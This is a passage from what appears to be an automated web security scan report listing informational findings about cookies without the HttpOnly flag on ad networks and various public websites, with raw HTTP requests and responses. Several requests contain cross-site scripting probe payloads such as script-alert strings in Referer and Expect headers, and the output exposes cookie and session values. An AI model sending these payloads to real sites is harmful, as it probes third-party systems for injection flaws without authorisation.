BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
ROLL=AfAia6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7maJ!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
54361916=_4d96151b,5335516523,775634^894872^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BwTFW2EBAAAABAAAAoAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
BASE=gKQkgmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6eHnzzntzG!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
ROLL=AfAiU6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/vnUtq1r5N!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:08 GMT; path=/
47025873=_4d96153c,3635670272,782463^950857^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BwRFW2EBAAAABAAAAUAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
ROLL=AfAib6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCL!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:36 GMT; path=/
70936362=_4d96151c,7111480630,782463^956558^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BYRFW2EBAAAABAAAAIAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
ROLL=AfAic6Nga0dM2aDL/oJpfuO!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:30 GMT; path=/
21125090=_4d961516,2247225356,782464^894873^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=B8SFW2EBAAAABAAAAcAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
ROLL=AfAiZ6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:55 GMT; path=/
83041319=_4d96152f,2174120635,782464^950887^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.125. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301674073:GM=1:IG=3:SG=1:S=ps_zWfqBdyxTsy8E; expires=Sun, 31-Mar-2013 16:07:53 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.126. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

U=AAAAAAAAAACMOJ53uksRkw--; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com
G=10104000001069486483; expires=Fri, 01-Apr-2016 00:17:19 GMT; path=/; domain=.mmismm.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.127. http://tags.bluekai.com/site/2045 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2045

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=JfvU5CAacrJh4f95; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com
bkc=KJh5NVN1kVDROdegmqhpzaWVVSRNKDxdJOImnAsEktYNZ1zFoVANa3jD/lBrkwJucOVaYWgUumk+4GOVRTZBTPSROqSjtKon6ydBBJkSeHSOGlnEIFI4ztfw45N4p+kF8l252Xr8fIK87iciNTGzcV0BoACCPUIt0mYQ015MIb/CrEIwUgkcII7Dov5pHYGM7FpyXdbGJ0J6CKmccJzfn7BzbgMWXugcepoKbqM/XUncEhPG4I+gcNG30k0dX4hj/rLUKF/O2LBTFWYDZEzKhz49luJ+mf5CF0dFGxXfj+TTQoGEUuv7KrnN2vMMfqmNNp7IvW5f6PhwH7gTdXV58fQUIHWgl0ti47XTgaloZwmlw5roEfWzyNMpfdVAGKVBSvozY2mqUCPk2M1IQFBlzAEAt5D5312wG22N4JIFpUgM2pcGcT6T1IMc25c4at345LhbTtwGkpG31kSU5BLYqKSBgtUCd10/qcQibSTpt+DBtCLzk2bP59XIXgWdPjjfXgxwmrjX33hItX2TLCQmZ4ayFtNUmcbXVgF3Ert8M3I6S92LNrjXMWKhUp7RpNOa4c86uPiqKK1mdeSjTDkgqP16U5TgoF26pnhhar3wcheJF5yKNBmq5ZrUhfE8qj0JI4bYdjQRMZsI8IbC5fbicUw1XRlc1jdhnW2rqtGnNA+p4qSjB8b9J8edLnW+scXiAq4BFwWLl/XqrjbzUqfloF2mNtqKKe1IIZTP3RdDTp85UWllmZqKI1VWZT5SQdggKadAJ2TU/qyFSw8rdOUtnyFdjdMgVJY7FNripqphcey44X/CpEpsdzGBdB+sDV8hUekcZI4w+g5x2hwccBITWdL8M41pBH04eplkZckMwB3kOw4FjW1E7LddlDsF02jKb8MNhZs1fIw2zdHTz2Ywnif68w0UpjCwur9nF7q8bbn14LSFjR3An4jAUZW2lmfEHfSvXZccge5ZFyVHIcMOdz/CU/UNEVvIhoWktk04q4RpgLwchstTz8qccEBF7/lhrtL235rS2YbXMh4O/5hWIg0Fp4typUfsyfCdlIe8sqjXy7ayd3pbp3UhdChd5pgV2YEVXNnuSXnSyUGEfLE87T42KiStnjGCGyP6VqPt3VwVsfIektcMY+0jH8bwoA7FGluZTXkifDrm2pIQFzXhhf12M4+f029nm/X5a4uDTfXzdNmz2Y5T7LEyFg8yRy4tqfNc7XwplEqc1hb920Jd14OMQjZlpqhhwfynIU2CfZ2d/ZIqKKwwTcqAh0ypqp+Tc04Xv50vd/IVZq4BFwWxl/7XZ8Sj+XtXXKXTEtFfwcA8DCXXpI7wm6ujKK1+vWgOII4vghFCZo/+i4+Cl/Kp+0nEAhpX4IhwapkZlMiWdMmTwtUaBE52N4ajU8Fl0Eqfsz2Q4Ew57FiVlN3Z45gUjMdqfs5XaxbdfzAUHDk7mI8So7lvNtjdtIhF7/F8c6E2zfANmvXf9kd0+PkFZdUsdyBcsqzG; expires=Wed, 28-Sep-2011 18:17:05 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.128. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bklc=4d96162f; expires=Sun, 03-Apr-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bk=quDHgOAacrJh4f95; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bkc=KJh5NZN1kVDROdegT4U9yUUv/Lr6JGdGCIEe6uPGXCvLaFw6oEu+hLvDSZEmMPJKi3miWWcosiV2gxdxSibh15yvLX9t1N+2S43CZujE3XWizaHrV4dgmK4ilB4N8qe4pFIbfo5plXde5O8HP5uMflXbWwm/SO3rBnfwr1vTlnM1rBHTM4s2h3rBiTNUsM2K3wtBgdlOzkJI/iwkxfkWQTBWcTl+MbUHl47LNUrNmu2Km/5GytvwlGm87MNKu13zaTdiRIOtGFj5ttwo5cAFIf9h8XPHNJpGJMgPZbC7MhgFZvr2lFMewm6kXp6SbKU8J8hFl/4XiJwF/Pn4lhdVgMnZIqrKSIgEczzhNL/fwVoL4EVVx54Yf16FAEnlWhdOdoXz/Uo3qu43YpnjqhF48V+pF4C5ewofWXTRIFcbtBXPSjXt87gh14EnsYDS36I84jWt8XUUz7eKjGQtwoo02h7+ZAq+Mzjk+bUziTXYfWINT28XfRwswJ23o2Im1hT+C5BAwJhFN8UsM2HGP2I3w5dTu3FtyOj+7G2TawrPCdN136p1MN6SNrSXrOw4EVjfNaqUc1ri56gR4hCpUo0eIrBFWDDr5yENf1Nf+YFitFhUc1JX4XjIE9pc152p5fOlFSQ5BIqhhKmRplimHpzl+y4gj4wbUcBKw9aw/w2IDlLydAx0f8gpTMZTc2zMcoN5rVdV4tPozNbXOHd2Bh/NHO+y70brj4zjzNfXUB/+xtNOdqdjHcT565cOk9r1mudIWFrjQ2XldaPXN+Xr6ISXKObKkpdi6/SmX48a9FIbijHqMSFZS4B85m6+NFl/Z1zU5tadolsKoGREXtawsUBKMWz2kK/I7ZhLhFwbFNFRblmNNhkpFEi1XUtXFTTKqy7bLDrvwegdHxFZAhfTQ325XxGozpdh00sipvDKnuC3Qe+X2oa+ocpRZmFals2HBeaKzB2yvB5Q4jmRgpibEJFU88gfiKFh1UWEf3eMzVwmil1h4AI5HdUqD+bB2dAum96lAllKNIq2z1l2h1mTMNdMKHot41/Tmc2m4540HcXK46XVNFxRNFBX0QIa+RwNJ+taXfX9IdPA4cLLZ6RntKDNtZUsUY2IW0dcokVT1yXXWXrAFQ4j/KwJWrNnhQ4r658Fpmm87Lq2FVcGVjpcpAgtkws4h7IUowyh7i2hFnXFUBIJd5FQLzdCKKIShh1wywrxFhMTTzYz5XN8XuaTBdndy1cdjXZXSXbnwTDfAO2ppc7Uy4L8bDdQBrHdz1h8N8yUeXa50ndZZwmrmudIeK5oUq2cn6xqQrzfIfBmDrSXKYrv6FWIrFnnJgit5sF04GMfz4jVCEpvyIdcd57ahoyUobcdem8wKD7+gvXS7dVNIEb887fisShFoLzMldcgvfHwI2gzppUlWNIayt2T2ckh0g7slur6Ed7SlBXN2h5c1wIe3cXbDGFprMwyJPIqbNNpF4CdhSKNF9==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com
bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E1015RUZIRnksHQRLMmDsYyBeRt1ManBEOvBALhuAyN1ERhBWXN1DQhEAG01MD61RvojZB/0ibmJ6Nc5AjXuATaXE3RsP/pD8QjMYp9qQx943A3Sx==; expires=Wed, 28-Sep-2011 18:15:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.129. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

480-SM=adver_04-01-2011-18-10-29; expires=Mon, 04-Apr-2011 18:10:30 GMT; path=/; domain=c3metrics.com
480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_04-01-2011-18-10-30_14981377291301681430; expires=Wed, 30-Mar-2016 18:10:30 GMT; path=/; domain=c3metrics.com
480-nUID=adver_14981377291301681430; expires=Fri, 01-Apr-2011 18:25:30 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

7.130. http://www.allgetaways.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allgetaways.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LB-allgetaways=ZeWGMm0/7/nSO+zdYs6D9X5ILhDe5MEzm2yUL7hwVN2Orge0qW4f1Ge276lq1qJA1hat+R5yFcuc6w==; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allgetaways.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:04:50 GMT
Set-Cookie: LB-allgetaways=ZeWGMm0/7/nSO+zdYs6D9X5ILhDe5MEzm2yUL7hwVN2Orge0qW4f1Ge276lq1qJA1hat+R5yFcuc6w==; path=/

7.131. http://www.amway.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amway.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

x_Amway=USQSB104 - NA.03.01.03-2011.03.28.1823; path=/
__AmwayTmp=cid=0&cnty=US&lng=EN&bn=Visitor&orgclass=Visitor&put=Applicant1&crncy=USD&vcartid=eebb676b-4b26-4182-8e3a-4c819b186906; domain=.amway.com; path=/
TLTHID=0539D39648D35D7F5A9612A91A404282; Path=/; Domain=.amway.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.132. http://www.androidtapp.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-content/plugins/wp-spamfree/js/wpsf-js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/wp-spamfree/js/wpsf-js.php HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:08 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
X-Powered-By: PHP/5.2.9
Set-Cookie: GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-javascript
Content-Length: 1526
Vary: User-Agent

// WP-SpamFree 2.1.0.9 JS Code :: BEGIN

// Cookie Handler :: BEGIN
function GetCookie( name ) {
   var start = document.cookie.indexOf( name + '=' );
   var len = start + name.length + 1;
   if
...[SNIP]...

7.133. http://www.androidtapp.com/wp-login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wordpress_test_cookie=WP+Cookie+check; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.134. http://www.battleofthecheetos.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.battleofthecheetos.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

analytics1=R280046876; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.battleofthecheetos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: analytics1=R280046876; path=/
Date: Fri, 01 Apr 2011 16:38:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 481
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.135. http://www.belkin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.belkin.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

belQuality=42d5_4d960211_WEBSVR01; domain=.belkin.com; path=/;
BIGipServermain_web_pool=1948781066.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.136. http://www.betus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.betus.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerCERES_pool=2559969802.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.betus.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
X-SID: v02
Date: Fri, 01 Apr 2011 16:50:32 GMT
Content-Length: 60
Set-Cookie: BIGipServerCERES_pool=2559969802.20480.0000; path=/
X-PvInfo: [S10413.C0.A0.R0.G0].[OT/plaintext.OG/documents]

The page cannot be displayed because the expectation failed.

7.137. http://www.billoreilly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.billoreilly.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjqqh_cjmmpsfjmmz.dpn=ffffffff09091c0d45525d5f4f58455e445a4a423660;expires=Fri, 01-Apr-2011 16:39:50 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.billoreilly.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
ETag: W/"894-1069445758000"
Last-Modified: Fri, 21 Nov 2003 20:15:58 GMT
Content-Length: 894
Date: Fri, 01 Apr 2011 15:39:50 GMT
Set-Cookie: NSC_wjqqh_cjmmpsfjmmz.dpn=ffffffff09091c0d45525d5f4f58455e445a4a423660;expires=Fri, 01-Apr-2011 16:39:50 GMT;path=/

..............h.......(....... ...............H...H.............(..8((88(8......h..8`.8P....( 08P.HPX... .( ....8 (.. ...( 8............Hh....... H(.. .. ........X................X.....h..8H...80 @
...[SNIP]...

7.138. http://www.blacksingles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blacksingles.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_wjq_hmpcbm.tqbsl.dpn_80=0e4367143660;expires=Fri, 01-Apr-11 16:44:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Found
Date: Fri, 01 Apr 2011 16:32:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /?
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 123
Set-Cookie: NSC_wjq_hmpcbm.tqbsl.dpn_80=0e4367143660;expires=Fri, 01-Apr-11 16:44:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f%3f">here</a>.</h2>
</body></html>

7.139. http://www.bluefly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluefly.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TS18d374=46e085ecd119b4b4ec1cbf1acf8177dc6e0d026fc5b86c784d95f92f; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluefly.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:11:27 GMT
Content-Length: 15366
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TS18d374=46e085ecd119b4b4ec1cbf1acf8177dc6e0d026fc5b86c784d95f92f; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><meta scheme='a1afcc517bec909bf5c3fddea7c83c3d' name='TS18d374' content='ace91468dcc2cebe' /><scri
...[SNIP]...

7.140. http://www.boardgamegeek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boardgamegeek.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-48e91082=48e9108c:3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boardgamegeek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/0.7.65
Date: Fri, 01 Apr 2011 16:22:15 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://geekdo-images.com/favicon.ico?
Expires: Wed, 28 Sep 2011 07:29:59 GMT
Content-Length: 331
Set-Cookie: Coyote-2-48e91082=48e9108c:3; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://geekdo-images.co
...[SNIP]...

7.141. http://www.bradsdeals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bradsdeals.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LB-Persist=355797514.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bradsdeals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:36:19 GMT
Content-Length: 60
Set-Cookie: LB-Persist=355797514.20480.0000; path=/

